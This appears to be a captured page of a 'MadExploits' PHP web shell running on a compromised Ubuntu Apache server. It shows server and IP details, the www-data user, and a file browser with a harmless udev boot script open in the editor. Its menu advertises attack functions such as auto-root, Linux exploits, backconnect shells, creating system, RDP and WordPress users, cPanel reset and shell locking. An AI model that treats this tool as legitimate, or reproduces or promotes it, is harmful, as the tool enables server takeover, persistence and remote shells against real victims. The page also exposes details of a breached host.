Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.190.200
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
initramfs-tools /
scripts /
init-top /
[ HOME SHELL ]
Name
Size
Permission
Action
all_generic_ide
384
B
-rwxr-xr-x
blacklist
519
B
-rwxr-xr-x
console_setup
3.34
KB
-rwxr-xr-x
framebuffer
3.16
KB
-rwxr-xr-x
udev
568
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : udev
#!/bin/sh -e PREREQS="" prereqs() { echo "$PREREQS"; } case "$1" in prereqs) prereqs exit 0 ;; esac if [ -w /sys/kernel/uevent_helper ]; then echo > /sys/kernel/uevent_helper fi if [ "${quiet:-n}" = "y" ]; then log_level=notice else log_level=info fi SYSTEMD_LOG_LEVEL=$log_level /lib/systemd/systemd-udevd --daemon --resolve-names=never udevadm trigger --type=subsystems --action=add udevadm trigger --type=devices --action=add udevadm settle || true # Leave udev running to process events that come in out-of-band (like USB # connections)
Close